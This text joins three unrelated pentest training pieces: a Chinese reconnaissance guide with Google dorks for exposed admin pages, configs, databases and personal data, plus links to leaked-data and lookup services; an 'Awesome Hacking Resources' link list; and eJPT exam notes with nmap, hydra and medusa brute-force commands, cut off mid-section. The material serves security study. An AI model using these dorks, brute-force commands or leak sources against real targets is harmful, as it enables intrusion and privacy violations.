inurl:admin_login | inurl:system | inurl:backend site:target.com intitle:管理 | 后台 | 后台管理 | 登陆 | 登录 ``` - 上传类漏洞地址 ``` site:target.com inurl:file site:target.com inurl:upload ``` - 注入页面 ``` site:target.com inurl:php?id= ``` - 编辑器页面 ``` site:target.com inurl:ewebeditor ``` - 目录遍历漏洞 ``` site:target.com intitle:index.of ``` - SQL错误 ``` site:target.com intext:"sql syntax near" | intext:"syntax error has occurred" | intext:"incorrect syntax near" | intext:"unexpected end of SQL command" | intext:"Warning: mysql_connect()" | intext:”Warning: mysql_query()" | intext:”Warning: pg_connect()" ``` - phpinfo() ``` site:target.com ext:php intitle:phpinfo "published by the PHP Group" ``` - 配置文件泄露 ``` site:target.com ext:.xml | .conf | .cnf | .reg | .inf | .rdp | .cfg | .txt | .ora | .ini ``` - 数据库文件泄露 ``` site:target.com ext:.sql | .dbf | .mdb | .db ``` - 日志文件泄露 ``` site:target.com ext:.log ``` - 备份和历史文件泄露 ``` site:target.com ext:.bkf | .bkp | .old | .backup | .bak | .swp | .rar | .txt | .zip | .7z | .sql | .tar.gz | .tgz | .tar ``` - 公开文件泄露 ``` site:target.com filetype:.doc | .docx | .xls | .xlsx | .ppt | .pptx | .odt | .pdf | .rtf | .sxw | .psw | .csv ``` - 邮箱信息 ``` site:target.com intext:@target.com site:target.com 邮件 site:target.com email ``` - 社工信息 ``` site:target.com intitle:账号 | 密码 | 工号 | 学号 | 身份证 ``` ![](img/1594459-20200119152425254-1738721113.png) ## JS获取敏感接口 ### JSFinder JSFinder是一款用作快速在网站的js文件中提取URL,子域名的工具。 - 安装 ``` pip3 install requests bs4 git clone https://github.com/Threezh1/JSFinder.git ``` - 使用 ``` python3 JSFinder.py -u http://www.mi.com python3 JSFinder.py -u http://www.mi.com -d ``` ![](img/1594459-20200119152940819-547890202.png) ### LinkFinder 该工具通过网站中的JS文件来发现服务端、敏感信息、隐藏控制面板的URL链接等有用信息,可最大化地提高URL发现效率 - 安装 ``` git clone https://github.com/GerbenJavado/LinkFinder.git cd LinkFinder python2 setup.py install ``` - 使用 在线JavaScript文件中查找端点的最基本用法,并将结果输出到results.html: ``` python linkfinder.py -i https://example.com/1.js -o results.html ``` CLI输出(不使用jsbeautifier,这使得它非常快): ``` pyhon linkfinder.py -i https://example.com/1.js -o cli ``` 分析整个域及其JS文件: ``` python linkfinder.py -i https://example.com -d ``` Burp输入(在目标中选择要保存的文件,右键单击,Save selected items将该文件作为输入): ``` python linkfinder.py -i burpfile -b ``` 枚举JavaScript文件的整个文件夹,同时查找以/ api /开头的终结点,并最终将结果保存到results.html: ``` python linkfinder.py -i 'Desktop/*.js' -r ^/api/ -o results.html ``` ![](img/1594459-20200119153545222-989750205.png) ## 目录&后台扫描 常用工具-自己 ``` 7kbscan-WebPathBrute https://github.com/7kbstorm/7kbscan-WebPathBrute DirMap https://github.com/H4ckForJob/dirmap dirsearch https://github.com/maurosoria/dirsearch Fuzz-gobuster https://github.com/OJ/gobuster Fuzz-dirbuster OWASP kali自带 Fuzz-wfuzz https://github.com/xmendez/wfuzz Test404轻量后台扫描器+v2.0 御剑 ``` 个人比较喜欢使用Fuzz大法,不管是目录扫描、后台扫描、Web漏洞模糊测试都是非常灵活的。这几款fuzz工具都比较好用 ``` 基于Go开发:gobuster 基于Java开发:dirbuster 基于Python开发:wfuzz ``` - dirbuster ![](img/1594459-20200119155315684-2055799224.png) - wfuzz ![](img/1594459-20200119155738473-643631035.png) 工具无论再多再好,没有一个好的字典一切都是空谈。强大字典是需要自己平时慢慢的积累。 ## 越权查询 遍历uid获得身份信息等 ## 代码托管 通过代码托管平台搜索敏感信息(内部邮箱账号密码、数据库账号密码等) - github GitHub是一个面向开源及私有软件项目的托管平台。 平台地址:https://github.com/ GitHub敏感信息泄露一直是企业信息泄露和知识产权泄露的重灾区,安全意识薄弱的同事经常会将公司的代码、各种服务的账户等极度敏感的信息『开源』到github中,github也是黑、白帽子、安全工程师的必争之地。 Github泄露扫描系统开发:https://sec.xiaomi.com/article/37 GitHub敏感信息泄露监控:[GSIL](https://github.com/FeeiCN/GSIL)、[Github-Monitor](https://github.com/VKSRC/Github-Monitor) 在GitHub中一般通过搜索网站域名、网站JS路径、网站备案、网站下的技术支持等进行敏感信息查询 ![](img/1594459-20200119162240355-550566948.png) - gitee 平台地址:https://gitee.com/ 码云:开源中国出品的代码托管、协作开发平台。 - gitcafe GitCafe一个基于代码托管服务打造的技术协作与分享平台 ## Whois&备案查询 通过Whois和备案查询得到网站的注册人、手机号、邮箱等(对后续的密码生成和社工很有帮助) ## 公网网盘 公司员工可能把一些内部资料放在了公网网盘,然后被在线云网盘搜索的网站抓取了,我们就可以利用这个来对目标系统进行深入挖掘。 可以利用云网盘搜索工具搜集敏感文件,一般直接输入厂商名字进行搜索 ### 凌风云搜索 地址:https://www.lingfengyun.com/ ![](img/1594459-20200119143019466-1878206759.png) ### 小白盘搜索 - 地址:https://www.xiaobaipan.com/ ### 大力盘搜索 - 地址:https://www.dalipan.com/ ### 小不点搜索(微盘) - 地址:https://www.xiaoso.net/ ![](img/1594459-20200324083040.png) ### 百度网盘爬取开源工具 - 地址:https://github.com/gudegg/yunSpider ## 网站截图 对目标网站页面进行截图,通过截图找到敏感页面 ### webscreenshot 基于[`url-to-image`](https://github.com/kimmobrunfeldt/url-to-image/)的网站截图工具 - 安装 ``` git clone https://github.com/maaaaz/webscreenshot.git apt-get update && apt-get -y install phantomjs phantomjs -v Ubuntu 16 中安装 phantomjs 出现 QXcbConnection 问题 export QT_QPA_PLATFORM=offscreen export QT_QPA_FONTDIR=/usr/share/fonts ``` - 使用 ``` cd webscreenshot/ python2.7 webscreenshot.py -i url.txt ``` ![](img/1594459-20200119161002755-701856606.png) ## 获取公开文件 ### snitch Snitch可以针对指定域自动执行信息收集过程。此工具可帮助收集可通过Web搜索引擎找到的指定信息。在渗透测试的早期阶段,它可能非常有用。 - 安装 ``` git clone https://github.com/Smaash/snitch.git ``` - 使用 ``` python2.7 snitch.py -C "site:whitehouse.gov filetype:pdf" -P 100 ``` ![](img/1594459-20200119161531465-1731396088.png) ### Google Hacking ``` site:target.com filetype:.doc | .docx | .xls | .xlsx | .ppt | .pptx | .odt | .pdf | .rtf | .sxw | .psw | .csv ``` ![](img/1594459-20200119161241851-445496927.png) ## 邮箱信息收集 ### Infoga Infoga可从不同的公共源网络(搜索引擎,pgp密钥服务器和shodan)收集电子邮件帐户信息(ip,主机名,国家/地区...)。是一个用法非常简单的工具,但是,对于渗透测试的早期阶段,或者只是为了了解自己公司在互联网上的可见性是非常有效的。 - 安装 ``` git clone https://github.com/m4ll0k/Infoga.git /data/infoga cd /data/infoga pip3 install requests python3 infoga.py ``` - 使用 ``` python3 infoga.py --domain site.com --source all -v 3 | grep Email | cut -d ' ' -f 3 | uniq | sed -n '/-/!p' python3 infoga.py --info [email protected] python3 infoga.py --info [email protected] -b ``` ### Google Hacking ``` site:target.com intext:@target.com site:target.com 邮件 site:target.com email ``` ![](img/1594459-20200119161412993-1570311002.png) ### Online Search Email 通过全球最大的几个数据泄露站点在线查询邮箱信息泄露情况 ``` https://monitor.firefox.com/ https://haveibeenpwned.com/ https://ghostproject.fr/ ``` ## 历史资产 ### wayback wayback会记录网站版本更迭,可以获取到之前版本的网站,可能会找到一些后来删除的敏感资产信息,或者一些漏洞 平台地址:`https://web.archive.org/` 例如:腾讯2003.09.29的主页 ![](img/1594459-20200324091903.png) # 漏洞公共资源库 通过前期一定的信息收集搜索是否存在相应的历史版本漏洞 ## 国内 - [国家信息安全漏洞库](http://www.cnnvd.org.cn/) - [国家信息安全漏洞共享平台](https://www.cnvd.org.cn/) - [SeeBug](https://www.seebug.org/?ref=www) - [信息安全漏洞门户 VULHUB](http://vulhub.org.cn/view/global) - [数字观星](https://poc.shuziguanxing.com/#/) - [NSFOCUS绿盟科技](http://www.nsfocus.net/index.php?act=sec_bug) - [BugScan--漏洞插件社区](http://www.bugscan.net/source/template/vulns/) - [漏洞列表 | 教育行业漏洞报告平台(Beta)](https://src.sjtu.edu.cn/list/) - [工控系统行业漏洞库平台](http://ivd.winicssec.com/) - [exp库-打造中文最大exploit库](http://www.expku.com/) - [乌云漏洞库](https://github.com/hanc00l/wooyun_public) ## 国外 - [Exploit-db](https://www.exploit-db.com/) - [ Sploitus | Exploit & Hacktool Search Engine](https://sploitus.com/) - [packetstorm](https://packetstormsecurity.org/) - [SecurityFocus](https://www.securityfocus.com/bid) - [cxsecurity](https://cxsecurity.com/exploit/) - [rapid7 Vulnerability & Exploit Database](https://www.rapid7.com/db/) - [Most recent entries - CVE-Search](https://cve.circl.lu/) - [CVE security vulnerability database. Security vulnerabilities, exploits](https://www.cvedetails.com/) - [CVE mitre - Search CVE List](https://cve.mitre.org/cve/search_cve_list.html) - [美国官方工控数据库 ICS-CERT Landing | CISA](https://www.us-cert.gov/ics) - [路由器漏洞搜索 Routerpwn - One click exploits, generators, tools, news, vulnerabilities, poc](http://www.routerpwn.com/) # 社会工程 > 世界第一黑客凯文·米特尼克在《反欺骗的艺术》中曾提到,人为因素才是安全的软肋。很多企业、公司在信息安全上投入大量的资金,最终导致数据泄露的原因,往往却是发生在人本身。你们可能永远都想象不到,对于黑客们来说,通过一个用户名、一串数字、一串英文代码,社会工程师就可以通过这么几条的线索,通过社工攻击手段,加以筛选、整理,就能把你的所有个人情况信息、家庭状况、兴趣爱好、婚姻状况、你在网上留下的一切痕迹等个人信息全部掌握得一清二楚。虽然这个可能是最不起眼,而且还是最麻烦的方法。一种无需依托任何黑客软件,更注重研究人性弱点的黑客手法正在兴起,这就是社会工程学黑客技术。 ## SheGongKu You should know:TG、AnWang ``` https://dehashed.com/ https://aleph.occrp.org/ https://www.blackbookonline.info/ http://pwndb2am4tzkvold.onion/ TG-Robot:@shegongkubot ``` ## UserRegistrationInformation 通过用户的一些信息(Mail、Name、ID、Tel)查询用户注册过哪些应用 - [REG007](https://www.reg007.com/) - [检查160个社交网络上的注册情况 Check Usernames - Social Media Username Availability](https://checkusernames.com/) - [检查用户名注册情况在500个主流网站上 KnowEm用户名搜索:社交媒体,域名和商标](https://knowem.com/) - [检查用户名注册情况,同时检查注册过哪些域名 Namechk | Username, Domain, and Trademark Search | Username Registration](https://namechk.com/) ## IPInformation 通过IP地址获取位置信息 - [IP地址查询chaipip](http://chaipip.com/ip.php) - [高精度IP定位](https://www.opengps.cn/Data/IP/LocHighAcc.aspx) - [IP查询IPIP.NET](https://www.ipip.net/ip.html) - [ip2location](https://www.ip2location.com/demo/) - [maxmind](https://www.maxmind.com/en/geoip2-precision-demo) - [ip138](https://www.ip138.com/) - [ip.cn](https://ip.cn/) ## SomeProjects - [social-engineer-toolkit](https://github.com/trustedsec/social-engineer-toolkit)
<h1 align="center"> <br> <img width="200" src="https://cdn.rawgit.com/sindresorhus/awesome/master/media/logo.svg" alt="awesome"> <br> </h1> # Awesome Hacking Resources ![Awesome Hacking](https://img.shields.io/badge/awesome-hacking-red.svg) ![Awesome community](https://img.shields.io/badge/awesome-community-green.svg) A collection of hacking / penetration testing resources to make you better! **Let's make it the biggest resource repository for our community.** **You are welcome to fork and [contribute](https://github.com/vitalysim/Awesome-Hacking-Resources/blob/master/contributing.md#contribution-guidelines).** We started a new [tools](https://github.com/vitalysim/Awesome-Hacking-Resources/blob/master/tools.md) list, come and contribute ## Table of Contents * [Learning the Skills](#learning-the-skills) * [YouTube Channels](#youtube-channels) * [Conferences](#Conferences) * [NEWS](#NEWS) * [Sharpening Your Skills](#sharpening-your-skills) * [Reverse Engineering, Buffer Overflow and Exploit Development](#reverse-engineering-buffer-overflow-and-exploit-development) * [Privilege Escalation](#privilege-escalation) * [Malware Analysis](#malware-analysis) * [Vulnerable Web Application](#vulnerable-web-application) * [Vulnerable OS](#vulnerable-os) * [Exploits](#exploits) * [Forums](#forums) * [Archived Security Conference Videos](#archived-security-conference-videos) * [Online Communities](#online-communities) * [Online News Sources](#online-news-sources) * [Linux Penetration Testing OS](#linux-penetration-testing-os) Learning the Skills -- * [Learning Exploitation with Offensive Computer Security 2.0](http://howto.hackallthethings.com/2016/07/learning-exploitation-with-offensive.html) * [Cybrary](https://www.cybrary.it/) * [OffensiveComputerSecurity](https://www.cs.fsu.edu/~redwood/OffensiveComputerSecurity/lectures.html) * [CS 642: Intro to Computer Security](http://pages.cs.wisc.edu/~ace/cs642-spring-2016.html) * [Free cyber security training](https://www.samsclass.info/) * [SecurityTube](http://www.securitytube.net/) * [Seed Labs](http://www.cis.syr.edu/~wedu/seed/labs.html) * [Hak5](https://www.hak5.org/) * [OWASP top 10 web security risks](https://www.online.hack2secure.com/courses/owasp-top10-web-security-risk) * [MIT OCW 6.858 Computer Systems Security](https://ocw.mit.edu/courses/electrical-engineering-and-computer-science/6-858-computer-systems-security-fall-2014/) YouTube Channels -- * [OWASP](https://www.youtube.com/user/OWASPGLOBAL) * [Hak5](https://www.youtube.com/user/Hak5Darren) * [BlackHat](https://www.youtube.com/channel/UCJ6q9Ie29ajGqKApbLqfBOg) * [Christiaan008](https://www.youtube.com/channel/UCEPzS1rYsrkqzSLNp76nrcg) * Conferences <a id="Conferences"></a> * [44contv](https://www.youtube.com/user/44contv) * [BruCON Security Conference](https://www.youtube.com/channel/UCqwMU1l90lf9BLersW6eAHw) * [BSides Manchester](https://www.youtube.com/channel/UC1mLiimOTqZFK98VwM8Ke4w) * [BSidesAugusta](https://www.youtube.com/channel/UC85CvsnrVlD_44eEgzb2OfA) * [CarolinaCon](https://www.youtube.com/channel/UCTY3Dpz68CyrjwRzqkE4sFw) * [Cort Johnson](https://www.youtube.com/channel/UCV9r-yMeARWVCJEesim25Ag) * [DevSecCon](https://www.youtube.com/channel/UCgxhfP2Hi8MQYz6ZkwpLA0A) * [Garage4Hackers - Information Security](https://www.youtube.com/channel/UCDqagqREZlmJitWco-yPtvw/feed) * [HACKADAY](https://www.youtube.com/channel/UCnv0gfLQFNGPJ5MHSGuIAkw) * [Hack In The Box Security Conference](https://www.youtube.com/channel/UC0BJVNTIEbG8CLG-xVVWJnA) * [Hack in Paris](https://www.youtube.com/channel/UC7xJU9_oqw-vS6OJExS-2iA) * [Hacklu](https://www.youtube.com/channel/UCI6B0zYvK-7FdM0Vgh3v3Tg/feed) * [Hacktivity](https://www.youtube.com/feed/channels) * [Hardwear.io](https://www.youtube.com/channel/UChwYb9xc9tZXquQxu4G0l_g/featured) * [IEEE Symposium on Security and Privacy](https://www.youtube.com/channel/UC6pXMS7qre9GZW7A7FVM90Q) * [LASCON](https://www.youtube.com/channel/UCDHsOiMPS-SLppAOAJRD37Q) * [Marcus Niemietz](https://www.youtube.com/channel/UCtThfJl65L04ukWp0XZi3yg/videos) * [Media.ccc.de](https://www.youtube.com/channel/UC2TXq_t06Hjdr2g_KdKpHQg) * [NorthSec](https://www.youtube.com/channel/UCqVhMzTdQK5VAosAGkMtpJw) * [Pancake Nopcode](https://www.youtube.com/channel/UC3G6k7XfTgcWD2PJR8qJSkQ) * [Psiinon](https://www.youtube.com/channel/UC-3qyzm4f29C12KGp3-12bQ) * [SJSU Infosec](https://www.youtube.com/channel/UCDNzNvZlYK8jZLsUbdiGrsQ/videos) * [Secappdev.org](https://www.youtube.com/channel/UCSii2fuiLLlGqaR6sR_y0rA) * [Security Fest](https://www.youtube.com/channel/UCByLDp7r7gHGoO7yYMYFeWQ) * [SecurityTubeCons](https://www.youtube.com/channel/UC2wNN-Zqiq4J1PLPnyMBWUg) * [ToorCon](https://www.youtube.com/channel/UCnzjmL0xkTBYwFZD7agHGWw) * [USENIX Enigma Conference](https://www.youtube.com/channel/UCIdV7bE97mSPTH1mOi_yUrw/feed) * NEWS <a id="NEWS"></a> * [Corey Nachreiner](https://www.youtube.com/channel/UC7dUL0FbVPGqzdb2HtWw3Xg) * [Error 404 Cyber News](https://www.youtube.com/channel/UC4HcNHFKshqj-aeyi6imW7Q) * [Latest Hacking News](https://www.youtube.com/user/thefieldhouse/feed) * [Pentester Academy TV](https://www.youtube.com/channel/UChjC1q6Ami7W0E71TzPZELA) * [SecureNinjaTV](https://www.youtube.com/channel/UCNxfV4yR0nIlhFmfwcdf3BQ) * [Troy Hunt](https://www.youtube.com/channel/UCD6MWz4A61JaeGrvyoYl-rQ) * [Samy Kamkar's Applied Hacking](https://www.youtube.com/user/s4myk) * [danooct1](https://www.youtube.com/channel/UCqbkm47qBxDj-P3lI9voIAw) * [DedSec](https://www.youtube.com/channel/UCx34ZZW2KgezfUPPeL6m8Dw) * [DEFCON Conference](https://www.youtube.com/channel/UC6Om9kAkl32dWlDSNlDS9Iw) * [DemmSec](https://www.youtube.com/channel/UCJItQmwUrcW4VdUqWaRUNIg) * [Don Does 30](https://www.youtube.com/channel/UCarxjDjSYsIf50Jm73V1D7g) * [Geeks Fort - KIF](https://www.youtube.com/channel/UC09NdTL2hkThGLSab8chJMw) * [iExplo1t](https://www.youtube.com/channel/UCx0HClQ_cv0sLNOVhoO2nxg/videos) * [HACKING TUTORIALS](https://www.youtube.com/channel/UCbsn2kQwNxcIzHwbdDjzehA) * [LiveOverflow](https://www.youtube.com/channel/UClcE-kVhqyiHCcjYwcpfj9w) * [Metasploitation](https://www.youtube.com/channel/UC9Qa_gXarSmObPX3ooIQZrg) * [NetSecNow](https://www.youtube.com/channel/UC6J_GnSAi7F2hY4RmnMcWJw) * [Open SecurityTraining](https://www.youtube.com/channel/UCthV50MozQIfawL9a_g5rdg) * [BalCCon - Balkan Computer Congress](https://www.youtube.com/channel/UCoHypmu8rxlB5Axh5JxFZsA) * [Penetration Testing in Linux](https://www.youtube.com/channel/UC286ntgASMskhPIJQebJVvA) * [rwbnetsec](https://www.youtube.com/channel/UCAJ8Clc3188ek9T_5XTVzZQ) * [Security Weekly](https://www.youtube.com/channel/UCg--XBjJ50a9tUhTKXVPiqg) * [Seytonic](https://www.youtube.com/channel/UCW6xlqxSY3gGur4PkGPEUeA) * [Shozab Haxor](https://www.youtube.com/channel/UCBwub2kRoercWQJ2mw82h3A) * [SSTec Tutorials](https://www.youtube.com/channel/UCHvUTfxL_9bNQgqzekPWHtg) * [Waleed Jutt](https://www.youtube.com/channel/UCeN7cOELsyMHrzfMsJUgv3Q) * [webpwnized](https://www.youtube.com/channel/UCPeJcqbi8v46Adk59plaaXg) * [JackkTutorials](https://www.youtube.com/channel/UC64x_rKHxY113KMWmprLBPA) * [Zer0Mem0ry](https://www.youtube.com/channel/UCDk155eaoariJF2Dn2j5WKA) * [LionSec](https://www.youtube.com/channel/UCCQLBOt_hbGE-b9I696VRow) * [Adrian Crenshaw](https://www.youtube.com/user/irongeek) * [HackerSploit](https://www.youtube.com/channel/UC0ZTPkdxlAKf-V33tqXwi3Q) Sharpening Your Skills -- * [OWASP Security Shepherd](https://security-shepherd.ctf365.com/login.jsp) * [CTFLearn](https://ctflearn.com/) * [CTFs write-ups](https://github.com/ctfs) * [CTF365](https://ctf365.com/) * [Pentestit](https://lab.pentestit.ru/) * [Hacksplaining](https://www.hacksplaining.com/) * [The cryptopals crypto challenges](http://cryptopals.com/) * [The enigma group](https://www.enigmagroup.org/) * [Ringzer0 Team](https://ringzer0team.com/challenges) * [Hack The Box](https://www.hackthebox.gr/en/login) * [Over the wire](http://overthewire.org/wargames/) * [Backdoor](https://backdoor.sdslabs.co) * [Vulnhub](https://www.vulnhub.com/) * [Hack.me](https://hack.me/) * [Hack this site!](https://www.hackthissite.org/) * [Exploit exercises](https://exploit-exercises.com/) * [PentesterLab](https://pentesterlab.com/) * [SmashTheStack](http://smashthestack.org/wargames.html) * [Root-Me](https://www.root-me.org/) * [PicoCTF](https://2017game.picoctf.com/) * [Shellter Labs](https://shellterlabs.com/en/) * [Pentest Practice](https://www.pentestpractice.com/) * [Pentest.training](https://pentest.training) * [pwnable.kr](http://pwnable.kr/) * [hackburger.ee](http://hackburger.ee/) * [http://noe.systems/](http://noe.systems/) * [Hacker Gateway](https://www.hackergateway.com/) * [Solve Me](http://solveme.safflower.kr/) * [Challenge Land](http://challengeland.co/) * [Participating Challenge Sites](http://www.wechall.net/active_sites/all/by/site_avg/DESC/page-1) * [Hacker test](http://www.hackertest.net/) * [Crackmes.de Archive (2011-2015)](https://tuts4you.com/download.php?view.3152) * [ROP Emporium](https://ropemporium.com/) Reverse Engineering, Buffer Overflow and Exploit Development -- * [Shell storm](http://shell-storm.org/) * [Buffer Overflow Exploitation Megaprimer for Linux](http://www.securitytube.net/groups?operation=view&groupId=4) * [Reverse Engineering Malware 101](https://securedorg.github.io/RE101/) * [Reverse Engineering Malware 102](https://securedorg.github.io/RE102/) * [Modern Binary Exploitation - CSCI 4968](https://github.com/RPISEC/MBE) * [Introductory Intel x86](http://www.opensecuritytraining.info/IntroX86.html) * [Binary hacking](http://liveoverflow.com/binary_hacking/index.html) * [Shellcode Injection](https://dhavalkapil.com/blogs/Shellcode-Injection/) * [Reverse Engineering for Beginners](https://beginners.re/RE4B-EN.pdf) * [Exploit tutorials](http://www.primalsecurity.net/tutorials/exploit-tutorials/) * [Exploit development](https://0x00sec.org/c/exploit-development) * [Corelan tutorials](https://www.corelan.be/index.php/2009/07/19/exploit-writing-tutorial-part-1-stack-based-overflows/) * [Reverse engineering reading list](https://github.com/onethawt/reverseengineering-reading-list/blob/master/README.md) * [Reverse Engineering challenges](https://challenges.re/) * [Reverse Engineering for beginners (GitHub project)](https://github.com/dennis714/RE-for-beginners) * [reversing.kr challenges](http://www.reversing.kr/challenge.php) * [Analysis and exploitation (unprivileged)](https://www.it-sec-catalog.info/analysis_and_exploitation_unprivileged.html) * [A Course on Intermediate Level Linux Exploitation](https://github.com/nnamon/linux-exploitation-course) * [Lena's Reversing for Newbies (Complete)](https://tuts4you.com/download.php?view.2876) Privilege Escalation -- * [Reach the root](https://hackmag.com/security/reach-the-root/) * [Basic linux privilege escalation](https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/) * [Windows Privilege Escalation](http://www.bhafsec.com/wiki/index.php/Windows_Privilege_Escalation) * [Privilege escalation for Windows and Linux](https://github.com/AusJock/Privilege-Escalation) * [Windows Privilege Escalation Fundamentals](http://www.fuzzysecurity.com/tutorials/16.html) * [RootHelper](https://github.com/NullArray/RootHelper) * [Windows exploits, mostly precompiled.](https://github.com/abatchy17/WindowsExploits) * [Unix privesc checker](http://pentestmonkey.net/tools/audit/unix-privesc-check) * [Privilege escalation linux with live example](http://resources.infosecinstitute.com/privilege-escalation-linux-live-examples/) * [Windows privilege escalation checker](https://github.com/netbiosX/Checklists/blob/master/Windows-Privilege-Escalation.md) * [Linux Privilege Escalation Scripts](http://netsec.ws/?p=309#more-309) * [AutoLocalPrivilegeEscalation](https://github.com/ngalongc/AutoLocalPrivilegeEscalation) * [Linux Privilege Escalation Check Script](https://github.com/sleventyeleven/linuxprivchecker) * [Local Linux Enumeration & Privilege Escalation Cheatsheet](https://www.rebootuser.com/?p=1623) * [4 Ways get linux privilege escalation](http://www.hackingarticles.in/4-ways-get-linux-privilege-escalation/) Malware Analysis -- * [Malware traffic analysis](http://www.malware-traffic-analysis.net/) * [Malware Analysis - CSCI 4976](https://github.com/RPISEC/Malware/blob/master/README.md) Vulnerable Web Application -- * [OWASP Hackademic Challenges project](https://github.com/Hackademic/hackademic/) * [bWAPP](http://www.itsecgames.com/) * [Damn Vulnerable Web Application (DVWA)](http://www.dvwa.co.uk/) * [Xtreme Vulnerable Web Application (XVWA)](https://github.com/s4n7h0/xvwa) * [WebGoat: A deliberately insecure Web Application](https://github.com/WebGoat/WebGoat) * [OWASP Mutillidae II](https://sourceforge.net/projects/mutillidae/files/) * [OWASP Broken Web Applications Project](https://github.com/chuckfw/owaspbwa/) * [Damn Small Vulnerable Web](https://github.com/stamparm/DSVW) * [OWASP Juice Shop](https://github.com/bkimminich/juice-shop) Vulnerable OS -- * [Metasploitable2 (Linux)](https://sourceforge.net/projects/metasploitable/files/Metasploitable2/) * [Metasploitable3](https://github.com/rapid7/metasploitable3) \[[Installation](https://github.com/rapid7/metasploitable3/blob/master/README.md)\] Linux Penetration Testing OS -- * [BackBox](https://backbox.org/index) * [BlackArch](https://blackarch.org/index.html) * [Kali](http://kali.org/) * [LionSec Linux](https://lionsec-linux.org/) * [Parrot ](https://www.parrotsec.org/) Exploits -- * [Exploit Database](https://www.exploit-db.com/) * [CXsecurity](https://cxsecurity.com/exploit/) * [0day.today](http://0day.today/) * [Snyk Vulnerability DB](https://snyk.io/vuln/) Forums -- * [Greysec](https://greysec.net) * [Hackforums](https://hackforums.net/) * [0x00sec](https://0x00sec.org/) * [Antichat](https://forum.antichat.ru/) Archived Security Conference Videos -- * [InfoCon.org](https://infocon.org/cons/) * [Irongeek](http://www.irongeek.com/) Online Communities -- * [Hack+](http://t.me/hacking_group_channel) Online News Sources -- * [InfoSec](http://www.infosecurity-magazine.com/) * [Threatpost](https://threatpost.com/) * [Security Intell](https://securityintelligence.com/news/git-vulnerabilities-found-in-version-control-systems/) * [The Hacker News](https://thehackernews.com/)
# eJPT Notes 2022 *(eLearnSecurity Junior Penetration Tester)* #### Twitter: @GRuMPzSux ### Collection of notes to prepare for the eLearnSecurity eJPT certification exam. ### Before you continue reading, please do the following: ###### 1. Please sign up for a **FREE** https://ine.com account, and complete the Penetration Testing Student course. It is ABSOLUTE FREE! To be honest, everything you need to pass the eJPT is in that free course. ###### 2. Do NOT treat this exam as a CTF box. This is NOT like a CTF box. Host Discovery is important. 😉 # Host Discovery / Enumeration #### Let's find out what we are working with. We are completely blind. ![image](https://user-images.githubusercontent.com/80599694/147906631-44437a80-1098-4275-bc2f-22b8827da8bb.png) ### Ping Sweep, who can we find on the network? #### fping: ````bash fping -a -g {IP RANGE} 2>/dev/null ```` #### fping example: ````bash fping -a -g 10.10.10.0/8 2>/dev/null ````` #### Nmap Ping Sweep: ````bash nmap -sn 10.10.10.0/8 | grep -oP '(?<=Nmap scan report for )[^ ]*' ```` # Enumerate Hosts Found on Network #### Once you have found alive hosts on a network, its time to knock on the doors. #### Nmap TCP Quick Scan (step 1) ````bash nmap -sC -sV 10.10.10.10 ```` #### Nmap TCP Full Scan (Step 2) ````bash nmap -sC -sV -p- 10.10.10.10 ```` #### Nmap UDP Quick Scan ````bash nmap -sU -sV 10.10.10.10 ```` #### Always save your scans, you never know when you need to pull them up. ````bash nmap -sn 10.10.10.0/24 -oN hosts.nmap ```` # Find Common Vulnerabilities #### After you have done all of your scans, and identified open ports on your target, it's time to see if any services are vulnerable. ![image](https://user-images.githubusercontent.com/80599694/147908174-3d6663e0-4049-4471-969c-f43db2c9c74e.png) #### Common Ports to Look at: | Port | Protocol | | ------------- |:-------------:| | 21 | FTP | | 22 | SSH | | 23 | TELNET | | 25 | SMTP | | 53 | DNS | | 80 | HTTP | | 443 | HTTPS | | 110 | POP3 | | 115 | SFTP | | 143 | IMAP | | 135 | MSRPC | | 137 | NETBIOS | | 138 | NETBIOS | | 139 | NETBIOS | | 445 | SMB | | 3306 | MYSQL | | 1433 | MYSQL | | 3389 | RDP | ### Use Nmap as a Lightweight Vulnerability Scanner ````bash nmap -sV --script=vulners -v 10.10.10.1 ```` ##### if you do not have vulners installed, please install here: https://github.com/vulnersCom/nmap-vulners ````bash nmap --script vuln --script-args=unsafe=1 -iL hosts.nmap ```` ## Port 21 - FTP Enumeration ##### Sometimes clues are put here. :wink: Old versions of FTP maybe vulnerable. Always check the version. Search for the exploit using Google / Searchsploit / Rapid7. If you find some credential, try it on SSH / Login page / database. #### Enumerate FTP Service with Nmap: ````bash nmap --script=ftp-anon,ftp-bounce,ftp-libopie,ftp-proftpd-backdoor,ftp-vsftpd-backdoor,ftp-vuln-cve2010-4221,tftp-enum -p 21 $ip ```` #### Check for FTP Vulnerabilities with Nmap: ````bash nmap --script=ftp-* -p 21 10.10.10.1 ```` #### Connect to FTP Service: ````bash ftp 10.10.10.1 ```` ````bash ncftp 10.10.10.1 ```` ##### Many ftp-servers allow anonymous users. anonymous:anonymous 👈️ #### Bruteforce FTP with a Known Username You Found: ````bash hydra -l $user -P /usr/share/john/password.lst ftp://10.10.10.1:21 ```` ````bash hydra -l $user -P /usr/share/wordlistsnmap.lst -f 10.10.10.1 ftp -V ```` ````bash medusa -h 10.10.10.1 -u $user -P passwords.txt -M ftp ```` #### Enumerate Users on FTP Service: ````bash ftp-user-enum.pl -U users.txt -t 10.10.10.1 ```` ````bash ftp-user-enum.pl -M iu -U users.txt -t $ip ```` ##### If you do not have ftp-user-enum.pl, you can download it here: https://pentestmonkey.net/tools/ftp-user-enum/ftp-user-enum-1.0.tar.gz #### Useful Commands for FTP Service (cmd line): ````bash • send # Send single file • put # Send one file. • mput # Send multiple files. • mget # Get multiple files. • get # Get file from the remote computer. • ls # list • mget * # Download everything • binary = Switches to binary transfer mode. • ascii = Switch to ASCII transfer mode ```` #### Always Check for FTP Configuration Files: ````bash • ftpusers • ftp.conf • proftpd.conf ```` ##### Vulnerable FTP Versions: ````bash • ProFTPD-1.3.3c Backdoor • ProFTPD 1.3.5 Mod_Copy Command Execution • VSFTPD v2.3.4 Backdoor Command Execution ```` #### FTP Exploitation Methodology: ````bash 1. Gather version numbers 2. Check Searchsploit 3. Check for Default Creds 4. Use Creds previously gathered 5. Download the software ```` ## Port 445 - SMB Enumeration #### Always check for SMB. You might get lucky and find a vulnerable machine running SMB that has remote code execution. Remember to use searchsploit, or google to check all service versions for publicly available exploits. #### Scan for NETBIOS/SMB Service with Nmap: ````bash nmap -p 139,445 --open -oG smb.txt 192.168.1.0/24 ```` #### Scan for NETBIOS/SMB Service with nbtscan: ````bash nbtscan -r 192.168.1.0/24 ```` #### Enumerate the Hostname: ````bash nmblookup -A 10.10.10.1 ```` #### Check for Null Sessions: 